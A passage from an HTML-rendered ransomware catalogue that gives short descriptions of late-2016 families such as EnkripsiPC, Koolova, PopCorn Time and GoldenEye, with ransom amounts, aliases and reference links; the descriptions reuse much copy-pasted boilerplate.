<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker demands 0.2 bitcoins. The ransomware poses as a Window update.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1794. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2016-cryptxxx-koolova-cerber-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2016-cryptxxx-koolova-cerber-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/811587154983981056">https://twitter.com/struppigel/status/811587154983981056</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enkripsipc_ransomware"><a class="anchor" href="#_enkripsipc_ransomware"></a><a class="link" href="#_enkripsipc_ransomware">EnkripsiPC Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name</p>
</div>
<div class="paragraph">
<p>EnkripsiPC Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>IDRANSOMv3</p>
</li>
<li>
<p>Manifestus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1795. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/811343914712100872">https://twitter.com/demonslay335/status/811343914712100872</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/811264254481494016">https://twitter.com/BleepinComputer/status/811264254481494016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/811587154983981056">https://twitter.com/struppigel/status/811587154983981056</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_braincrypt_ransomware"><a class="anchor" href="#_braincrypt_ransomware"></a><a class="link" href="#_braincrypt_ransomware">BrainCrypt Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. So far the victims are from Belarus and Germany.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1796. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/braincrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/braincrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_msn_cryptolocker_ransomware"><a class="anchor" href="#_msn_cryptolocker_ransomware"></a><a class="link" href="#_msn_cryptolocker_ransomware">MSN CryptoLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.2 bitcoins.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1797. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/810766686005719040">https://twitter.com/struppigel/status/810766686005719040</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoblock_ransomware"><a class="anchor" href="#_cryptoblock_ransomware"></a><a class="link" href="#_cryptoblock_ransomware">CryptoBlock Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is in the amount is 0.3 bitcoins. The ransomware is disguises themselves as Adobe Systems, Incorporated. RaaS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1798. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/drProct0r/status/810500976415281154">https://twitter.com/drProct0r/status/810500976415281154</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aes_ni_ransomware"><a class="anchor" href="#_aes_ni_ransomware"></a><a class="link" href="#_aes_ni_ransomware">AES-NI Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1799. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_koolova_ransomware"><a class="anchor" href="#_koolova_ransomware"></a><a class="link" href="#_koolova_ransomware">Koolova Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker of this ransomware tends to make lots of spelling errors in his requests. With Italian text that only targets the Test folder on the user&#8217;s desktop</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1800. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/koolova-ransomware-decrypts-for-free-if-you-read-two-articles-about-ransomware/">https://www.bleepingcomputer.com/news/security/koolova-ransomware-decrypts-for-free-if-you-read-two-articles-about-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fake_globe_ransomware"><a class="anchor" href="#_fake_globe_ransomware"></a><a class="link" href="#_fake_globe_ransomware">Fake Globe Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 1bitcoin.</p>
</div>
<div class="paragraph">
<p>Fake Globe Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Globe Imposter</p>
</li>
<li>
<p>GlobeImposter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1801. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/fwosar/status/812421183245287424">https://twitter.com/fwosar/status/812421183245287424</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/globeimposter">https://decrypter.emsisoft.com/globeimposter</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/809795402421641216">https://twitter.com/malwrhunterteam/status/809795402421641216</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_v8locker_ransomware"><a class="anchor" href="#_v8locker_ransomware"></a><a class="link" href="#_v8locker_ransomware">V8Locker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1802. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/v8locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/v8locker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptorium_fake_ransomware"><a class="anchor" href="#_cryptorium_fake_ransomware"></a><a class="link" href="#_cryptorium_fake_ransomware">Cryptorium (Fake Ransomware)</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1803. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/cryptorium-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/cryptorium-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_antihacker2017_ransomware"><a class="anchor" href="#_antihacker2017_ransomware"></a><a class="link" href="#_antihacker2017_ransomware">Antihacker2017 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to Russian speaking users, there fore is able to infect mosty the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc … The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money only a warning about looking at porn (gay, incest and rape porn to be specific).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1804. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cia_special_agent_767_ransomware_fake"><a class="anchor" href="#_cia_special_agent_767_ransomware_fake"></a><a class="link" href="#_cia_special_agent_767_ransomware_fake">CIA Special Agent 767 Ransomware (FAKE!!!)</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Your files are not really encrypted and nothing actually happens, however the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and he simply needed to delete the note. <a href="https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg" class="bare">https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1805. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/virus-removal/remove-cia-special-agent-767-screen-locker">https://www.bleepingcomputer.com/virus-removal/remove-cia-special-agent-767-screen-locker</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2016-samas-no-more-ransom-screen-lockers-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2016-samas-no-more-ransom-screen-lockers-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://guides.yoosecurity.com/cia-special-agent-767-virus-locks-your-pc-screen-how-to-unlock/">https://guides.yoosecurity.com/cia-special-agent-767-virus-locks-your-pc-screen-how-to-unlock/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loveserver_ransomware"><a class="anchor" href="#_loveserver_ransomware"></a><a class="link" href="#_loveserver_ransomware">LoveServer Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker request your IP address in return for the decryption.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1806. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kraken_ransomware"><a class="anchor" href="#_kraken_ransomware"></a><a class="link" href="#_kraken_ransomware">Kraken Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The hacker requests 2 bitcoins in return for the files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1807. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_antix_ransomware"><a class="anchor" href="#_antix_ransomware"></a><a class="link" href="#_antix_ransomware">Antix Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 0.25 bitcoins and the nickname of the hacker is FRC 2016.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1808. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_payday_ransomware"><a class="anchor" href="#_payday_ransomware"></a><a class="link" href="#_payday_ransomware">PayDay Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is R$950 which is due in 5 days. (R$ is a Brazilian currency) Based off of Hidden-Tear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1809. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/808316635094380544">https://twitter.com/BleepinComputer/status/808316635094380544</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_slimhem_ransomware"><a class="anchor" href="#_slimhem_ransomware"></a><a class="link" href="#_slimhem_ransomware">Slimhem Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1810. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_m4n1f3sto_ransomware_fake"><a class="anchor" href="#_m4n1f3sto_ransomware_fake"></a><a class="link" href="#_m4n1f3sto_ransomware_fake">M4N1F3STO Ransomware (FAKE!!!!!)</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… FILES DONT REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1811. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dale_ransomware"><a class="anchor" href="#_dale_ransomware"></a><a class="link" href="#_dale_ransomware">Dale Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… CHIP &gt; DALE</p>
</div>
<div class="paragraph">
<p>Dale Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DaleLocker Ransomware</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_ultralocker_ransomware"><a class="anchor" href="#_ultralocker_ransomware"></a><a class="link" href="#_ultralocker_ransomware">UltraLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Based on the idiotic open-source ransomware called CryptoWire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1812. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/ultralocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/ultralocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/807161652663742465">https://twitter.com/struppigel/status/807161652663742465</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aes_key_gen_assist_ransomware"><a class="anchor" href="#_aes_key_gen_assist_ransomware"></a><a class="link" href="#_aes_key_gen_assist_ransomware">AES_KEY_GEN_ASSIST Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1813. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/aeskeygenassist-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/aeskeygenassist-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/09/dxxd-ransomware.html">https://id-ransomware.blogspot.co.il/2016/09/dxxd-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/634258/aes-key-gen-assistprotonmailcom-help-support/">https://www.bleepingcomputer.com/forums/t/634258/aes-key-gen-assistprotonmailcom-help-support/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_code_virus_ransomware"><a class="anchor" href="#_code_virus_ransomware"></a><a class="link" href="#_code_virus_ransomware">Code Virus Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1814. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/code-virus-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/code-virus-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flkr_ransomware"><a class="anchor" href="#_flkr_ransomware"></a><a class="link" href="#_flkr_ransomware">FLKR Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1815. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/flkr-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/flkr-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_popcorn_time_ransomware"><a class="anchor" href="#_popcorn_time_ransomware"></a><a class="link" href="#_popcorn_time_ransomware">PopCorn Time Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others. Like shown in the note bellow: <a href="https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png" class="bare">https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1816. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/">https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hackedlocker_ransomware"><a class="anchor" href="#_hackedlocker_ransomware"></a><a class="link" href="#_hackedlocker_ransomware">HackedLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… NO POINT OF PAYING THE RANSOM—THE HACKER DOES NOT GIVE A DECRYPT AFTERWARDS.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1817. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goldeneye_ransomware"><a class="anchor" href="#_goldeneye_ransomware"></a><a class="link" href="#_goldeneye_ransomware">GoldenEye Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1818. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/goldeneye-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/goldeneye-ransomware.html</a></p></td>
</tr>
<tr>
